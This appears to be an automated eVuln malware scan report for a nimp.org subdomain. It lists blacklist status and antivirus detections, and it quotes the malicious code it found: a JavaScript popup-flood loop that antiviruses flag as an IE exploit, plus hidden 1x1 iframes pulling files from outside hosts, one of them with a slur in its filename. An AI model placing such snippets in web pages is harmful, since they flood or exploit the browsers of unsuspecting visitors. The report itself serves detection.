New scan:

Malware Scanner report for gnaa-members.on.nimp.org

Malicious/Suspicious/Total urls checked
2/0/2
2 pages have malicious code. See details below
Blacklists
Found
The website is marked by Google as suspicious.

The website "gnaa-members.on.nimp.org" is probably hacked and losing its visitors. You need to take action as soon as possible to fix security issues.
Malicious Redirects
OK
Malicious/Hidden/Total iFrames
4/2/6
4 malicious and 2 suspicious iframes found. See details below
Deface / Content modification
OK

Free periodic scanning and alerting: setup
(requires eVuln badge or a link to eVuln.com)

Malware & Hack Repair

  • Malware Removal
  • Blacklists Removal
  • Reason Eliminating
  • 1 Month Hack Insurance

More details

Website Hack Insurance

  • Files & DB Monitoring
  • Daily Backups
  • Malware & Hack Detection
  • Unlimited Hack Repairs

More details

Safe Browsing / Blacklists

Query: http://www.google.com/safebrowsing/diagnostic?site=gnaa-members.on.nimp.org

Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.

Scanned pages/files

RequestServer responseStatus
http://www.gnaa-members.on.nimp.org/
200 OK
Content-Length: 31517
Content-Type: text/html
malicious
Malicious code - confirmed by antiviruses (see below)

<!--
function shellscript() {
for(i = 0; i < 5; i++) {
open('http://www.gnaa-members.on.nimp.org/index.php?popup=1','_blank','scrollbar=no');
}
}
function main() {
x.DOM.Script.execScript(shellscript.toString());
x.DOM.Script.setTimeout("shellscript()");
setTimeout("main()", 200);
}

Antivirus reports:

nProtect
Generic.XPL.IESpoof.115769C0
Emsisoft
Generic.XPL.IESpoof.115769C0 (B)
Microsoft
Exploit:JS/MS05013.A
MicroWorld-eScan
Generic.XPL.IESpoof.115769C0
NANO-Antivirus
Trojan.Script.Agent.bqnzqw
F-Secure
Generic.XPL.IESpoof.115769C0
AVG
Exploit
GData
Generic.XPL.IESpoof.115769C0
Agnitum
JS.Noclose.U
BitDefender
Generic.XPL.IESpoof.115769C0

Hidden iFrame found.
size: 1x1     
src: http://bosslegen.de/~andres/flood.html

<iframe style="width: 1px; height: 1px;" src="http://bosslegen.de/~andres/flood.html">

Malicious iFrame found.
size: 1x1     
src: http://static.nimp.org/jews.wmv
This URL is marked by Google as suspicious

<iframe style="width: 1px; height: 1px;" src="http://static.nimp.org/jews.wmv">

Malicious iFrame found. The same iFrame was found in 3 websites.
size: 1x1     
src: http://static.nimp.org/lm.pdf
This URL is marked by Google as suspicious

<iframe style="width: 1px; height: 1px;" src="http://static.nimp.org/lm.pdf">

http://www.gnaa-members.on.nimp.org/test404page.js
200 OK
Content-Length: 31668
Content-Type: text/html
malicious
Malicious code - confirmed by antiviruses (see below)

<!--
function shellscript() {
for(i = 0; i < 5; i++) {
open('http://www.gnaa-members.on.nimp.org/index.php?popup=1','_blank','scrollbar=no');
}
}
function main() {
x.DOM.Script.execScript(shellscript.toString());
x.DOM.Script.setTimeout("shellscript()");
setTimeout("main()", 200);
}

Antivirus reports:

nProtect
Generic.XPL.IESpoof.115769C0
Emsisoft
Generic.XPL.IESpoof.115769C0 (B)
Microsoft
Exploit:JS/MS05013.A
MicroWorld-eScan
Generic.XPL.IESpoof.115769C0
NANO-Antivirus
Trojan.Script.Agent.bqnzqw
F-Secure
Generic.XPL.IESpoof.115769C0
AVG
Exploit
GData
Generic.XPL.IESpoof.115769C0
Agnitum
JS.Noclose.U
BitDefender
Generic.XPL.IESpoof.115769C0

Malicious iFrame found. The same iFrame was found in 3 websites.
size: 1x1     
src: http://static.nimp.org/lm.pdf
This URL is marked by Google as suspicious

<iframe style="width: 1px; height: 1px;" src="http://static.nimp.org/lm.pdf">

Malicious iFrame found.
size: 1x1     
src: http://static.nimp.org/jews.wmv
This URL is marked by Google as suspicious

<iframe style="width: 1px; height: 1px;" src="http://static.nimp.org/jews.wmv">

Hidden iFrame found.
size: 1x1     
src: http://bosslegen.de/~andres/flood.html

<iframe style="width: 1px; height: 1px;" src="http://bosslegen.de/~andres/flood.html">


Malicious Redirects

First query (normal visit):
GET / HTTP/1.1
Host: gnaa-members.on.nimp.org

Result:
Second query (visit from search engine):
GET / HTTP/1.1
Host: gnaa-members.on.nimp.org
Referer: http://www.google.com/search?q=gnaa-members.on.nimp.org

Result:
The result is similar to the first query. There are no suspicious redirects found.